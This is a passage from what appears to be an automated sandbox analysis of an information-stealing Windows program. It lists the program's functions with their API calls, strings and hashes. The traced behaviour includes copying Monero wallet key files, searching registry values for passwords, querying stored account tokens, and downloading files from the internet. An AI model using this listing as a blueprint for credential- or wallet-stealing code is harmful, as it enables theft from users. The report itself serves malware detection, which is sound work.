                          • Part of subcall function 009912A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009912D7
                          • Part of subcall function 009912A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009912F5
                          • Part of subcall function 009912A0: RegCloseKey.ADVAPI32(?), ref: 009912FF
                        • lstrcat.KERNEL32(?,00000000), ref: 0099134F
                        • lstrlen.KERNEL32(?), ref: 0099135C
                        • lstrcat.KERNEL32(?,.keys), ref: 00991377
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                          • Part of subcall function 009A8B60: GetSystemTime.KERNEL32(009B0E1A,015B9A38,009B05AE,?,?,009913F9,?,0000001A,009B0E1A,00000000,?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009A8B86
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00991465
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                          • Part of subcall function 009999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009999EC
                          • Part of subcall function 009999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00999A11
                          • Part of subcall function 009999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00999A31
                          • Part of subcall function 009999C0: ReadFile.KERNEL32(000000FF,?,00000000,0099148F,00000000), ref: 00999A5A
                          • Part of subcall function 009999C0: LocalFree.KERNEL32(0099148F), ref: 00999A90
                          • Part of subcall function 009999C0: CloseHandle.KERNEL32(000000FF), ref: 00999A9A
                        • DeleteFileA.KERNEL32(00000000), ref: 009914EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                        • API String ID: 3478931302-218353709
                        • Opcode ID: 873fe3e803a3db25caaaededb3fb699281548537ad2e8646780175088e3bb46a
                        • Instruction ID: d5bc193112b594570712b247a526d0baaeb0d13704bfd993e138d2671ab70024
                        • Opcode Fuzzy Hash: 873fe3e803a3db25caaaededb3fb699281548537ad2e8646780175088e3bb46a
                        • Instruction Fuzzy Hash: FB5183B1D101195BCB55FB60DD92BEE733CAF91300F4041A8B60A62092EF346B89CFE6
                        Function 009975D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009972D0: memset.MSVCRT ref: 00997314
                          • Part of subcall function 009972D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0099733A
                          • Part of subcall function 009972D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009973B1
                          • Part of subcall function 009972D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0099740D
                          • Part of subcall function 009972D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00997452
                          • Part of subcall function 009972D0: HeapFree.KERNEL32(00000000), ref: 00997459
                        • lstrcat.KERNEL32(00000000,009B17FC), ref: 00997606
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00997648
                        • lstrcat.KERNEL32(00000000, : ), ref: 0099765A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0099768F
                        • lstrcat.KERNEL32(00000000,009B1804), ref: 009976A0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009976D3
                        • lstrcat.KERNEL32(00000000,009B1808), ref: 009976ED
                        • task.LIBCPMTD ref: 009976FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                        • String ID: :
                        • API String ID: 3191641157-3653984579
                        • Opcode ID: 5832bf0432c91b65091ae4f52e17ac6c5adb9ab51a1ecd305cf734cb02a7189a
                        • Instruction ID: a1a00f0cf35d481bdd00942d501a81602a18637f34448f9f71e0d4938e943b53
                        • Opcode Fuzzy Hash: 5832bf0432c91b65091ae4f52e17ac6c5adb9ab51a1ecd305cf734cb02a7189a
                        • Instruction Fuzzy Hash: 89315E71901109DBCF04EBF8DCA9EFFB378BB85701B144519F502A72A0EE34A946DB52
                        Function 009972D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • memset.MSVCRT ref: 00997314
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0099733A
                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009973B1
                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0099740D
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00997452
                        • HeapFree.KERNEL32(00000000), ref: 00997459
                        • task.LIBCPMTD ref: 00997555
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeOpenProcessValuememsettask
                        • String ID: Password
                        • API String ID: 2808661185-3434357891
                        • Opcode ID: 4a6e714cd43575a4922e92dc514d5ca3dbddaca68ec8dc6f0b75cbc2388f2c9b
                        • Instruction ID: c927e0809732af349c041ad2e93c26f67ab517e7aaa6524fd01a73724fd4ff42
                        • Opcode Fuzzy Hash: 4a6e714cd43575a4922e92dc514d5ca3dbddaca68ec8dc6f0b75cbc2388f2c9b
                        • Instruction Fuzzy Hash: 07613BB59141689BDF24DB54CC55BDAB7B8BF88300F0081E9E649A6141EF705FC9CFA1
                        Function 009A8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,015BD830,00000000,?,009B0E2C,00000000,?,00000000), ref: 009A8130
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A8137
                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 009A8158
                        • __aulldiv.LIBCMT ref: 009A8172
                        • __aulldiv.LIBCMT ref: 009A8180
                        • wsprintfA.USER32 ref: 009A81AC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB$@
                        • API String ID: 2774356765-3474575989
                        • Opcode ID: a51ed4db883af9daf9d4c9103ddf974b1e3bb85e4848e08cd858fcdf995f45ca
                        • Instruction ID: 3532e76ca3e1e34591a25e90ab1630d9cd459dbbd3a3a951ff1d7d005426ef2e
                        • Opcode Fuzzy Hash: a51ed4db883af9daf9d4c9103ddf974b1e3bb85e4848e08cd858fcdf995f45ca
                        • Instruction Fuzzy Hash: 41211AB1E45218ABDB00DFD4CC49FAFBBB8FB45B14F104619F605BB280DB7969018BA5
                        Function 009960A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                          • Part of subcall function 009947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00994839
                          • Part of subcall function 009947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00994849
                        • InternetOpenA.WININET(009B0DF7,00000001,00000000,00000000,00000000), ref: 0099610F
                        • StrCmpCA.SHLWAPI(?,015BE270), ref: 00996147
                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0099618F
                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009961B3
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 009961DC
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0099620A
                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00996249
                        • InternetCloseHandle.WININET(?), ref: 00996253
                        • InternetCloseHandle.WININET(00000000), ref: 00996260
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                        • String ID:
                        • API String ID: 2507841554-0
                        • Opcode ID: 2b72641dc5485572e887868f13ff93e7e5ec2b6846a3dc657ab86ecedc270bca
                        • Instruction ID: 44c6dbb3cf53c13e9cdb89f073de1f1ab004f31b489b94e9fd9798950f482dad
                        • Opcode Fuzzy Hash: 2b72641dc5485572e887868f13ff93e7e5ec2b6846a3dc657ab86ecedc270bca
                        • Instruction Fuzzy Hash: 225170B1A00218ABDF24DFA4DC55BEEB7B8FB44701F108099B605A71C0EB746E85CFA5
                        Function 0099BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                        • lstrlen.KERNEL32(00000000), ref: 0099BC9F
                          • Part of subcall function 009A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009A8E52
                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 0099BCCD
                        • lstrlen.KERNEL32(00000000), ref: 0099BDA5
                        • lstrlen.KERNEL32(00000000), ref: 0099BDB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                        • API String ID: 3073930149-1079375795
                        • Opcode ID: e78c5db54dc54ed97ea2ae065d3a489b61e18e24f51f6683f98e90e2be670af2
                        • Instruction ID: 3f2c19f422620493999e28527e711f793a31ce2f49d817559290776de3ce6f9b
                        • Opcode Fuzzy Hash: e78c5db54dc54ed97ea2ae065d3a489b61e18e24f51f6683f98e90e2be670af2
                        • Instruction Fuzzy Hash: D4B12C729101089BDF44EBA4DD96FEEB378AF95300F404169F507A6091EF386A49CBE6
                        Function 009A6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess$DefaultLangUser
                        • String ID: *
                        • API String ID: 1494266314-163128923
                        • Opcode ID: a5a25bb9ff8353b301350f20b2efdcbff16b1b93c11dcb2ce228c50fc24bc7d1
                        • Instruction ID: 298d1543652bd6455dbc3f81b9dfe5fdc567e32fc427c6cfbe750090042d19b3
                        • Opcode Fuzzy Hash: a5a25bb9ff8353b301350f20b2efdcbff16b1b93c11dcb2ce228c50fc24bc7d1
                        • Instruction Fuzzy Hash: AEF05E3091A209EFD3449FE0E92972CBB70FB05703F08019AE60987290EE705F41DBD6
                        Function 00994FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00994FCA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00994FD1
                        • InternetOpenA.WININET(009B0DDF,00000000,00000000,00000000,00000000), ref: 00994FEA
                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00995011
                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00995041
                        • InternetCloseHandle.WININET(?), ref: 009950B9
                        • InternetCloseHandle.WININET(?), ref: 009950C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                        • String ID:
                        • API String ID: 3066467675-0
                        • Opcode ID: 7b512572bf0cf855c44e5e331ce68f5319421a89260ce51c4fda41ca4ab85496
                        • Instruction ID: 72be43af1658a72487ad2b2df23b776be58f075084c755eb42ba33adaa5cf995
                        • Opcode Fuzzy Hash: 7b512572bf0cf855c44e5e331ce68f5319421a89260ce51c4fda41ca4ab85496
                        • Instruction Fuzzy Hash: 2531F2B4A41218ABDB20CF54DC85BDDB7B4EB48704F1081E9FA09A7281DB746EC58F99
                        Function 009A83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 009A8426
                        • wsprintfA.USER32 ref: 009A8459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 009A847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 009A848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 009A8499
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                        • RegQueryValueExA.ADVAPI32(00000000,015BD818,00000000,000F003F,?,00000400), ref: 009A84EC
                        • lstrlen.KERNEL32(?), ref: 009A8501
                        • RegQueryValueExA.ADVAPI32(00000000,015BD908,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,009B0B34), ref: 009A8599
                        • RegCloseKey.ADVAPI32(00000000), ref: 009A8608
                        • RegCloseKey.ADVAPI32(00000000), ref: 009A861A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
